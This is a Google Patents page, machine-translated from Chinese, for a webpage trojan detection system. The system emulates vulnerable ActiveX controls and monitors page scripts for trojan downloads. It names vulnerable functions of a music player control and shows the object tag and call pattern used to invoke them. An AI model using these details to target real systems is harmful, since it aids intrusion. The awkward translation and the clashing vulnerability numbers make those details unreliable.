CN102446253B - Webpage trojan detection method and system - Google Patents
Webpage trojan detection method and system Download PDFInfo
- Publication number
- CN102446253B CN102446253B CN201110439572.6A CN201110439572A CN102446253B CN 102446253 B CN102446253 B CN 102446253B CN 201110439572 A CN201110439572 A CN 201110439572A CN 102446253 B CN102446253 B CN 102446253B
- Authority
- CN
- China
- Prior art keywords
- webpage
- activex control
- simulation
- script
- classid
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Abstract
The invention discloses a webpage trojan detection method and system which are applied to a webpage trojan detection environment. In the invention, an ActiveX control is simulated, different loophole functions existing in different versions of the same third-party software are integrated in the simulated ActiveX control, the classid of the simulated ActiveX control is set to be the same as the same classid of the ActiveX control of the third-party software of different versions, and the simulated ActiveX control is installed in the webpage trojan detection environment. The method comprises the following steps of: receiving a message of the called loophole function sent by a script running in the webpage to the simulated ActiveX control through the classid; returning the corresponding loophole function existing in the simulated ActiveX control to the script running in the webpage; and monitoring the behavior of the script so as to determine whether trojan exists in the webpage. Through the invention, the webpage trojan detection environment is compatible with the loopholes of multiple versions of the same software, and the accuracy and expansibility in webpage trojan detection are improved.
Description
Technical field
The present invention relates to network security technology field, particularly relate to a kind of Web page wooden horse detecting method and system.
Background technology
Webpage Trojan horse is the conventional attack means of a kind of hacker, and webpage Trojan horse utilizes bugs of third-party software to attack operating system conventionally.From attack effect, can be divided into two kinds, a kind of is the reason that browser self causes, and another kind is the reason that ActiveX control causes.The first is mainly that the leak that directly utilizes browser self to exist carries out malicious attack, and the second is the equal of indirectly to utilize browser to realize the attack to custom system.They are mainly the leaks that has utilized other third party software, for example " MPC " webpage Trojan horse, and the object starting a leak not is browser itself, but " MPC " this third party software.This just means to only have when " MPC " has been installed in custom system, just can be by this webpage Trojan horse program attack.When browser access is after this class webpage Trojan horse program, the Object object in web page code can make browser Automatically invoked have other softwares of leak.So leak will be triggered, the operational scheme of browser software is controlled by webpage Trojan horse, next will carry out the Shell Code of malice.
In order to detect whether there is webpage Trojan horse in webpage, can construct a webpage Trojan horse testing environment, this wooden horse testing environment is a system that operates in high in the clouds, webpage in its meeting automatic access internet, judge in which webpage and have wooden horse, prerequisite is which leak known third party software exists, and detects in webpage whether have the wooden horse of attacking for these known leaks.
Webpage Trojan horse testing environment is in the mode of carrying out webpage Trojan horse and conventionally can usage behavior while detecting detecting, and that is to say and will go to detect in webpage, whether have wooden horse according to the concrete behavior in webpage operational process.Therefore, if want to judge and whether have the wooden horse of attacking for the leak of certain third party software in webpage, just need in this webpage Trojan horse testing environment, this third party software be installed, make webpage can call leak function, trigger attack, like this by judging whether to call the behavior of this leak function, determine in webpage, whether there is the wooden horse of attacking for the leak of this third party software.
But, may have multiple versions with a third party software, may there is different leaks in different versions, and hacker may carry out combination attacks for the leak of multiple different editions, that is to say, a webpage may be attacked the multiple leak of same software different editions.If webpage Trojan horse testing environment only exists the software vulnerability of a version by assault, can not cover whole leaks, what if even there is highest version software vulnerability in webpage Trojan horse testing environment, assailant attacked is lowest version software vulnerability, or in webpage Trojan horse testing environment, there is lowest version software vulnerability and what attack is the situation for highest version software vulnerability, cause the most at last detecting the wooden horse existing in webpage, occur undetected or flase drop.
If can there are multiple different editions of same third party software in wooden horse testing environment simultaneously, the behavior of this combination attacks can be detected, and prevent undetected or flase drop; But, just as the same software of multiple versions can not be directly installed on same computer, in wooden horse testing environment, be also like this, unless created in multiple different webpage Trojan horse testing environments, the different editions of mounting software in each environment respectively, and then remove to detect the webpage Trojan horse of attacking for different editions.But obviously this can increase the hardware resource consumption of webpage Trojan horse testing environment greatly, wooden horse testing process also can more complicated.
Summary of the invention
The invention provides a kind of Web page wooden horse detecting method and system, can make multiple version leaks that webpage Trojan horse testing environment can compatible same software, improve accuracy and extendability that webpage Trojan horse detects.
The invention provides following scheme:
A kind of Web page wooden horse detecting method, be applied in webpage Trojan horse testing environment, simulation ActiveX control, the different leak functions that exist in the different editions of same third party software are incorporated in the ActiveX control of described simulation, and the classid of the ActiveX control of simulation is set to identical with the same classid of the ActiveX control of the described third party software of different editions, the ActiveX control of described simulation is arranged in described webpage Trojan horse testing environment; Described method comprises:
The message of the leak function calling that the script moving in reception webpage sends to the ActiveX control of described simulation by described classid;
The corresponding leak function of the existence in the ActiveX control of described simulation is returned to the script moving in described webpage;
Monitor the behavior of described script, to determine in described webpage whether have wooden horse.
Wherein, the message of calling leak function that the script moving in described reception webpage sends to the ActiveX control of described simulation by described classid comprises:
The message of the leak function existing in certain version that calls third party software that the script moving in reception webpage sends to the ActiveX control of described simulation by described classid.
Wherein, the message of calling leak function that the script moving in described reception webpage sends to the ActiveX control of described simulation by described classid comprises:
The message of the leak function existing at least two versions that call third party software that the script moving in reception webpage sends to the ActiveX control of described simulation by described classid.
Wherein, monitor the behavior of described script, whether exist wooden horse to comprise to determine in described webpage:
Whether detect the script moving in webpage initiatively downloads wooden horse file and moves malicious commands;
If so, in described webpage, there is wooden horse.
Wherein, analyze by the uniform resource position mark URL to downloaded file, judge whether described URL comprises the suffix of executable file format, judge whether described downloaded file is wooden horse file.
Wherein, described third party software is the software for browser function being strengthened by ActiveX control.
A kind of webpage Trojan horse detection system, be applied in webpage Trojan horse testing environment, simulation ActiveX control, the different leak functions that exist in the different editions of same third party software are incorporated in the ActiveX control of described simulation, and the classid of the ActiveX control of simulation is set to identical with the same classid of the ActiveX control of the described third party software of different editions, the ActiveX control of described simulation is arranged in described webpage Trojan horse testing environment; Described system comprises:
Call request receiving element, for receiving the message of the leak function calling that script that webpage moves sends to the ActiveX control of described simulation by described classid;
Function returns to unit, for the corresponding leak function of the existence of the ActiveX control of described simulation is returned to the script moving in described webpage;
Monitoring unit, for monitoring the behavior of described script, to determine in described webpage whether have wooden horse.
Wherein, described call request receiving element comprises:
First receives subelement, for receiving the message of the leak function existing in certain version that calls third party software that script that webpage moves sends to the ActiveX control of described simulation by described classid.
Wherein, described call request receiving element comprises:
Second receives subelement, for receiving the message of the leak function existing at least two versions that call third party software that script that webpage moves sends to the ActiveX control of described simulation by described classid.
Wherein, described monitoring unit comprises:
Whether detection sub-unit, initiatively download wooden horse file and move malicious commands for detection of the script moving in webpage;
Determine subelement, for if there is wooden horse in described webpage.
Wherein, described detection sub-unit is analyzed by the uniform resource position mark URL to downloaded file, judges whether described URL comprises the suffix of executable file format, judges whether described downloaded file is wooden horse file.
Wherein, described third party software is the software for browser function being strengthened by ActiveX control.
According to specific embodiment provided by the invention, the invention discloses following technique effect:
By the present invention, owing to having simulated the leak function of multiple versions of same third party software in same ActiveX control, therefore, can make multiple version leaks that webpage Trojan horse testing environment can compatible same software, thereby detect more all sidedly the wooden horse existing in webpage, improve accuracy and extendability that webpage Trojan horse detects, reduce the probability that occurs undetected phenomenon, and avoid causing the waste to hardware resource in webpage Trojan horse testing environment.
Brief description of the drawings
In order to be illustrated more clearly in the embodiment of the present invention or technical scheme of the prior art, to the accompanying drawing of required use in embodiment be briefly described below, apparently, accompanying drawing in the following describes is only some embodiments of the present invention, for those of ordinary skill in the art, do not paying under the prerequisite of creative work, can also obtain according to these accompanying drawings other accompanying drawing.
Fig. 1 is the process flow diagram of the method that provides of the embodiment of the present invention;
Fig. 2 is the schematic diagram of the device that provides of the embodiment of the present invention.
Embodiment
Below in conjunction with the accompanying drawing in the embodiment of the present invention, the technical scheme in the embodiment of the present invention is clearly and completely described, obviously, described embodiment is only the present invention's part embodiment, instead of whole embodiment.Based on the embodiment in the present invention, the every other embodiment that those of ordinary skill in the art obtain, belongs to the scope of protection of the invention.
First it should be noted that, because webpage Trojan horse normally reaches the object of attacking custom system by the script execution malicious code in webpage, and webpage is generally opened by browser, therefore, if webpage Trojan horse is wanted to attack for the leak of other third party softwares outside browser, this webpage wants the function that can call third party software by browser to realize.
On the other hand, ActiveX control is a kind of for strengthening the code of webpage function, for example, want to call download tools such as " sudden peals of thunder " and carry out the download of file in webpage, first corresponding ActiveX control just need to be installed, then could call download tool by this ActiveX control, and then utilize this download tool to complete downloading task.Visible, if want directly to call the third party software outside browser in webpage, need to be by means of ActiveX control.In other words, just because of the existence of ActiveX control, make the webpage of opening in browser can call third party software, and then also just making webpage Trojan horse call the leak function existing in third party software become possibility.That is to say, by ActiveX control, allow webpage to produce abundanter effect by script and widget interaction, but problem that simultaneously also may be with serving security.Therefore, the third party software described in the embodiment of the present invention can refer to the software for browser function being strengthened by ActiveX control.
In a word, all meetings of third party software are subject to the attack of webpage Trojan horse, are that the Object object in web page code can make browser Automatically invoked have other third party softwares of leak because there is leak in third party software.So leak is triggered, the operational scheme of browser software is controlled by webpage Trojan horse, next will carry out the ShellCode of malice.But the institute that not all third party software occurs leakyly can be utilized to do webpage Trojan horse, if a third party software is completely irrelevant with browser, the general object of attack that can not be called webpage Trojan horse.Therefore, only have the ActiveX control of third party software to start a leak, be just likely utilized and become webpage Trojan horse.
And in the Web page wooden horse detecting method that the embodiment of the present invention provides, in order to make the different editions that webpage Trojan horse testing environment can compatible same software, start with from ActiveX control exactly, carry out relevant processing.When specific implementation, first for certain third party software, first find out all versions that user commonly uses, and find out respectively the leak function existing in each version, then simulate the leak function in each version, ensure simulation softward and priginal soft indifference on triggering; Then the leak function in each version simulating is incorporated in an ActiveX control, then the ActiveX control of this simulation is installed in webpage Trojan horse testing environment.To guarantee no matter webpage Trojan horse is attacked for the software of which version, can trigger leak, and then detect this webpage Trojan horse according to concrete behavior.
For example, OnBeforeVideoDownload () function stack in the ActiveX control of known music player version exists Overflow Vulnerability (owing to being known leak, therefore conventionally can in China national information security vulnerability database (CNNVD), include; The CNNVD that supposes this leak is numbered CNNVD-200709-127), there is long-range Overflow Vulnerability (CNNVD that supposes this leak is numbered CNNVD-200905-130) in rawParse () the function stack in the ActiveX control of another version.These two leaks are all the security breaches that ActiveX control mps.dll occurs, but two leaks exist the software upgrade cycle of (for example 2 years) for a long time, and two leaks exist the interval of multiple versions.If in tangible general webpage Trojan horse testing environment, due to this music player software of a version can only be installed, if installed in webpage Trojan horse testing environment after this music player software that has CNNVD-200905-130 leak, this webpage Trojan horse testing environment just just can only detect the webpage Trojan horse of attacking for CNNVD-200905-130 leak, the compatible webpage Trojan horse of attacking for CNNVD-200905-127 leak that detects again.
And in embodiments of the present invention, in just can same mps.dll control, the classid " 6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB " of the original ActiveX control of simulation CNNVD-200905-130 and these two leaks of CNNVD-200905-127 is (owing to being the ActiveX control of different editions of same third party software, therefore, its classid is identical), because webpage Trojan horse is in the time calling the leak function in each software by different controls, distinguish different controls with classid, that is to say, if certain webpage Trojan horse is wanted to call certain leak function by control A, can in call request, write the classid of this control exactly.Therefore,, if the control that the embodiment of the present invention simulates also simulates original classid, webpage just can call the ActiveX control that the present invention simulates by Object object tag.For example, can call the ActiveX control simulating by following statement:
<object classid=″clsid:6BE52E1D-E586474f-A6E2-1A85A9B4D9FB″id=′target′></object>。
In addition, also need in ActiveX control, simulate the bug code in OnBeforeVideoDownload function and the rawParse function occurring respectively in two leaks, like this, make the script in webpage both can call rawParse function (target.rawParse (buffer)), also can call OnBeforeVideoDownload function (target.OnBeforeVideoDownload (buffer)).
In a word, also need the classid of the ActiveX control that simulates priginal soft, make webpage can call the ActiveX control that this simulates; Need in the ActiveX control that this simulates, integrate the leak function of the multiple versions of simulation simultaneously, make webpage can call the leak function that any one version exists, and then the operation action of script is detected, whether judgement wherein there is webpage Trojan horse.
After having carried out above-mentioned preliminary work, just the ActiveX control simulating can be arranged in webpage Trojan horse testing environment, simultaneously, the embodiment of the present invention also provides a kind of Web page wooden horse detecting method, specifically, in the time carrying out the detection of webpage Trojan horse, referring to Fig. 1, can comprise the following steps:
S101: the message of the leak function calling that the script moving in reception webpage sends to the ActiveX control of described simulation by described classid;
Identical owing to the classid of the ActiveX control of simulation being set to same classid with the ActiveX control of the described third party software of different editions, therefore, the script in webpage just can call the leak function of integrating in the ActiveX control simulating by this classid.
Wherein, because the wooden horse in a webpage may only be attacked for the leak function of a version, also may carry out combination attacks for the different leak functions of multiple versions, therefore, in the call request here, may be the leak function calling in certain version wherein, may be also the leak function calling in multiple versions.
S102: the corresponding leak function of the existence in the ActiveX control of described simulation is returned to the script moving in described webpage;
Different leak functions have different titles, and script in webpage is in the time calling different functions, can bring function name separately, therefore, directly according to function name in call request, what just can learn that script in webpage need to call is which or which function, and then corresponding function is returned to the script moving in webpage.
S103: monitor the behavior of described script, to determine in described webpage whether have wooden horse.
After the script moving, if really there is wooden horse in webpage, will trigger the attack of wooden horse in leak function is returned to webpage, therefore, continue the behavior of script to monitor, just can determine and wherein whether have wooden horse.Specifically in the time carrying out behavior monitoring, during due to the normal webpage of browser access, generally can automatically not download executable file (being called for short PE file) or move suspicious order, and the malicious act of typical webpage Trojan horse all can be downloaded a wooden horse file conventionally to local runtime, so monitor this two behaviors, just can determine webpage Trojan horse.Concrete, can be undertaken by following steps: first, detect the script moving in webpage and whether download wooden horse file, specifically can be to the URL of downloaded file (Uniform/Universal Resource Locator, URL(uniform resource locator)) analyze, see whether URL comprises the suffix of typical PE file layout, judge whether file layout is PE type, and remove some normal PE and download situation; Then, detect the script moving in webpage and whether move malicious commands, path and the command parameter of the executable file that specifically can carry out by inspection browser detect.If there are above-mentioned two class behaviors, can be judged to be to wrap in webpage left-handed wooden horse.
In a word, in embodiments of the present invention, owing to having simulated the leak function of multiple versions of same third party software in same ActiveX control, therefore, can make multiple version leaks that webpage Trojan horse testing environment can compatible same software, thereby detect more all sidedly the wooden horse existing in webpage, improve accuracy and extendability that webpage Trojan horse detects, reduce the probability that occurs undetected phenomenon, and avoid causing the waste to hardware resource in webpage Trojan horse testing environment.
The Web page wooden horse detecting method providing with the embodiment of the present invention is corresponding, the embodiment of the present invention also provides a kind of webpage Trojan horse detection system, referring to Fig. 2, this system applies is in webpage Trojan horse testing environment, when specific implementation, can simulate ActiveX control, the different leak functions that exist in the different editions of same third party software are incorporated in the ActiveX control of described simulation, and the classid of the ActiveX control of simulation is set to identical with the same classid of the ActiveX control of the described third party software of different editions, the ActiveX control of described simulation is arranged in described webpage Trojan horse testing environment, referring to Fig. 2, described system comprises:
Call request receives single, and 201, for receiving the message of the leak function calling that script that webpage moves sends to the ActiveX control of described simulation by described classid;
Function returns to unit 202, for the corresponding leak function of the existence of the ActiveX control of described simulation is returned to the script moving in described webpage;
Monitoring unit 203, for monitoring the behavior of described script, to determine in described webpage whether have wooden horse.
Wherein, call request receiving element 201 can comprise:
First receives subelement, for receiving the message of the leak function existing in certain version that calls third party software that script that webpage moves sends to the ActiveX control of described simulation by described classid.
Or call request receiving element 201 also can comprise:
Second receives subelement, for receiving the message of the leak function existing at least two versions that call third party software that script that webpage moves sends to the ActiveX control of described simulation by described classid.
When specific implementation, monitoring unit 203 can comprise:
Whether detection sub-unit, initiatively download wooden horse file and move malicious commands for detection of the script moving in webpage;
Determine subelement, for if there is wooden horse in described webpage.
Wherein, described detection sub-unit can be analyzed by the uniform resource position mark URL to downloaded file, judges whether described URL comprises the suffix of executable file format, judges whether described downloaded file is wooden horse file.
Wherein, third party software is the software for browser function being strengthened by ActiveX control.
In a word, in the webpage Trojan horse detection system providing in the embodiment of the present invention, owing to having simulated the leak function of multiple versions of same third party software in same ActiveX control, therefore, can make multiple version leaks that webpage Trojan horse testing environment can compatible same software, thereby detect more all sidedly the wooden horse existing in webpage, improve accuracy and extendability that webpage Trojan horse detects, reduce the probability that occurs undetected phenomenon, and avoid causing the waste to hardware resource in webpage Trojan horse testing environment.
As seen through the above description of the embodiments, those skilled in the art can be well understood to the mode that the present invention can add essential general hardware platform by software and realizes.Based on such understanding, the part that technical scheme of the present invention contributes to prior art in essence in other words can embody with the form of software product, this computer software product can be stored in storage medium, as ROM/RAM, magnetic disc, CD etc., comprise that some instructions (can be personal computers in order to make a computer equipment, server, or the network equipment etc.) carry out the method described in some part of each embodiment of the present invention or embodiment.
Each embodiment in this instructions all adopts the mode of going forward one by one to describe, between each embodiment identical similar part mutually referring to, what each embodiment stressed is and the difference of other embodiment.Especially,, for device or system embodiment, because it is substantially similar in appearance to embodiment of the method, so describe fairly simplely, relevant part is referring to the part explanation of embodiment of the method.Apparatus and system embodiment described above is only schematic, the wherein said unit as separating component explanation can or can not be also physically to separate, the parts that show as unit can be or can not be also physical locations, can be positioned at a place, or also can be distributed in multiple network element.Can select according to the actual needs some or all of module wherein to realize the object of the present embodiment scheme.Those of ordinary skill in the art, in the situation that not paying creative work, are appreciated that and implement.
Above to a kind of Web page wooden horse detecting method provided by the present invention and system, be described in detail, applied specific case herein principle of the present invention and embodiment are set forth, the explanation of above embodiment is just for helping to understand method of the present invention and core concept thereof; Meanwhile, for one of ordinary skill in the art, according to thought of the present invention, all will change in specific embodiments and applications.In sum, this description should not be construed as limitation of the present invention.
Claims (12)
1. a Web page wooden horse detecting method, be applied in webpage Trojan horse testing environment, it is characterized in that, for third party software simulation ActiveX control, and simulate different leak functions for the described third party software of different editions, the different leak functions that exist in the different editions of described third party software are incorporated in the ActiveX control of described simulation, and the classid of the ActiveX control of simulation is set to identical with the same classid of the ActiveX control of the described third party software of different editions, the ActiveX control of described simulation is arranged in described webpage Trojan horse testing environment, described method comprises:
The message of the leak function calling that the script moving in reception webpage sends to the ActiveX control of described simulation by described classid;
The corresponding leak function of the existence in the ActiveX control of described simulation is returned to the script moving in described webpage; Monitor the behavior of described script, to determine in described webpage whether have wooden horse.
2. method according to claim 1, is characterized in that, the message of calling leak function that the script moving in described reception webpage sends to the ActiveX control of described simulation by described classid comprises:
The message of the leak function existing in certain version that calls third party software that the script moving in reception webpage sends to the ActiveX control of described simulation by described classid.
3. method according to claim 1, is characterized in that, the message of calling leak function that the script moving in described reception webpage sends to the ActiveX control of described simulation by described classid comprises:
The message of the leak function existing at least two versions that call third party software that the script moving in reception webpage sends to the ActiveX control of described simulation by described classid.
4. whether method according to claim 1, is characterized in that, monitors the behavior of described script, exist wooden horse to comprise to determine in described webpage:
Whether detect the script moving in webpage initiatively downloads wooden horse file and moves malicious commands;
If so, in described webpage, there is wooden horse.
5. method according to claim 4, is characterized in that, analyzes by the uniform resource position mark URL to downloaded file, judges whether described URL comprises the suffix of executable file format, judges whether described downloaded file is wooden horse file.
6. according to the method described in claim 1 to 5 any one, it is characterized in that, described third party software is the software for browser function being strengthened by ActiveX control.
7. a webpage Trojan horse detection system, be applied in webpage Trojan horse testing environment, it is characterized in that, for third party software simulation ActiveX control, and simulate different leak functions for the described third party software of different editions, the different leak functions that exist in the different editions of described third party software are incorporated in the ActiveX control of described simulation, and the classid of the ActiveX control of simulation is set to identical with the same classid of the ActiveX control of the described third party software of different editions, the ActiveX control of described simulation is arranged in described webpage Trojan horse testing environment, described system comprises:
Call request receiving element, for receiving the message of the leak function calling that script that webpage moves sends to the ActiveX control of described simulation by described classid;
Function returns to unit, for the corresponding leak function of the existence of the ActiveX control of described simulation is returned to the script moving in described webpage;
Monitoring unit, for monitoring the behavior of described script, to determine in described webpage whether have wooden horse.
8. system according to claim 7, is characterized in that, described call request receiving element comprises:
First receives subelement, for receiving the message of the leak function existing in certain version that calls third party software that script that webpage moves sends to the ActiveX control of described simulation by described classid.
9. system according to claim 7, is characterized in that, described call request receiving element comprises:
Second receives subelement, for receiving the message of the leak function existing at least two versions that call third party software that script that webpage moves sends to the ActiveX control of described simulation by described classid.
10. system according to claim 7, is characterized in that, described monitoring unit comprises:
Whether detection sub-unit, initiatively download wooden horse file and move malicious commands for detection of the script moving in webpage;
Determine subelement, for if there is wooden horse in described webpage.
11. systems according to claim 10, it is characterized in that, described detection sub-unit is analyzed by the uniform resource position mark URL to downloaded file, judges whether described URL comprises the suffix of executable file format, judges whether described downloaded file is wooden horse file.
12. according to the system described in claim 7 to 11 any one, it is characterized in that, described third party software is the software for browser function being strengthened by ActiveX control.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201110439572.6A CN102446253B (en) | 2011-12-23 | 2011-12-23 | Webpage trojan detection method and system |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201110439572.6A CN102446253B (en) | 2011-12-23 | 2011-12-23 | Webpage trojan detection method and system |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN102446253A CN102446253A (en) | 2012-05-09 |
| CN102446253B true CN102446253B (en) | 2014-12-10 |
Family
ID=46008744
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201110439572.6A Active CN102446253B (en) | 2011-12-23 | 2011-12-23 | Webpage trojan detection method and system |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN102446253B (en) |
Families Citing this family (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103905269B (en) * | 2013-11-29 | 2017-11-28 | 哈尔滨安天科技股份有限公司 | Network bi-directional detection method and system based on format identification technology |
| CN104881605B (en) * | 2014-02-27 | 2018-10-02 | 腾讯科技(深圳)有限公司 | A kind of webpage redirects leak detection method and device |
| CN110348210B (en) * | 2018-04-08 | 2022-12-20 | 腾讯科技(深圳)有限公司 | Safety protection method and device |
| CN109033828B (en) * | 2018-07-25 | 2021-06-01 | 山东省计算中心(国家超级计算济南中心) | Trojan horse detection method based on computer memory analysis technology |
| CN110278212A (en) * | 2019-06-26 | 2019-09-24 | 中国工商银行股份有限公司 | Link detection method and device |
Citations (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101799855A (en) * | 2010-03-12 | 2010-08-11 | 北京大学 | Simulated webpage Trojan detecting method based on ActiveX component |
| US7971246B1 (en) * | 2004-04-29 | 2011-06-28 | James A. Roskind | Identity theft countermeasures |
-
2011
- 2011-12-23 CN CN201110439572.6A patent/CN102446253B/en active Active
Patent Citations (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US7971246B1 (en) * | 2004-04-29 | 2011-06-28 | James A. Roskind | Identity theft countermeasures |
| CN101799855A (en) * | 2010-03-12 | 2010-08-11 | 北京大学 | Simulated webpage Trojan detecting method based on ActiveX component |
Non-Patent Citations (2)
| Title |
|---|
| 基于ActiveX漏洞模拟机制的网页木马检测方法;郑聪 等;《全国计算机安全学术交流会论文集》;20101231;第142页右栏第3小节到第145页右栏第4小节,图1-3 * |
| 郑聪 等.基于ActiveX漏洞模拟机制的网页木马检测方法.《全国计算机安全学术交流会论文集》.2010,第142页右栏第3小节到第145页右栏第4小节,图1-3. * |
Also Published As
| Publication number | Publication date |
|---|---|
| CN102446253A (en) | 2012-05-09 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US11080399B2 (en) | System and method for vetting mobile phone software applications | |
| US8499352B2 (en) | Obfuscated malware detection | |
| Lin et al. | Automated forensic analysis of mobile applications on Android devices | |
| EP2979211B1 (en) | Protecting software application | |
| CN102916937B (en) | A kind of method, device and client device tackling web page attacks | |
| KR20160054589A (en) | Malware and exploit campaign detection system and method | |
| JP6791134B2 (en) | Analytical systems, analytical methods, analyzers and computer programs | |
| CN102446253B (en) | Webpage trojan detection method and system | |
| KR20150106889A (en) | System for and a method of cognitive behavior recognition | |
| KR102271545B1 (en) | Systems and Methods for Domain Generation Algorithm (DGA) Malware Detection | |
| CN104036019A (en) | Method and device for opening webpage links | |
| CN102882875B (en) | Active defense method and device | |
| CN103001947A (en) | Program processing method and program processing system | |
| CN104537308A (en) | System and method for providing application security auditing function | |
| CN102592086A (en) | Method and device for browsing webpages in sandbox | |
| EP3127036B1 (en) | Systems and methods for identifying a source of a suspect event | |
| CN112541178A (en) | Apparatus and method for control flow integrity enforcement | |
| CN111177727A (en) | Vulnerability detection method and device | |
| CN111859380A (en) | Zero false alarm detection method for Android App vulnerability | |
| CN102857519B (en) | Active defensive system | |
| CN103440453A (en) | Method for detecting operation environment of browser, client, server and system | |
| Kim et al. | {FuzzOrigin}: Detecting {UXSS} vulnerabilities in browsers through origin fuzzing | |
| CN106682496A (en) | Code injection attack detection method and device | |
| US9652365B2 (en) | Fault configuration using a registered list of controllers | |
| EP3018608A1 (en) | Method and system for detecting execution of a malicious code in a web-based operating system |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| C14 | Grant of patent or utility model | ||
| GR01 | Patent grant | ||
| TR01 | Transfer of patent right | ||
| TR01 | Transfer of patent right |
Effective date of registration: 20220323 Address after: 100016 1773, 15 / F, 17 / F, building 3, No.10, Jiuxianqiao Road, Chaoyang District, Beijing Patentee after: Sanliu0 Digital Security Technology Group Co.,Ltd. Address before: 100088 room 112, block D, 28 new street, new street, Xicheng District, Beijing (Desheng Park) Patentee before: BEIJING QIHOO TECHNOLOGY Co.,Ltd. |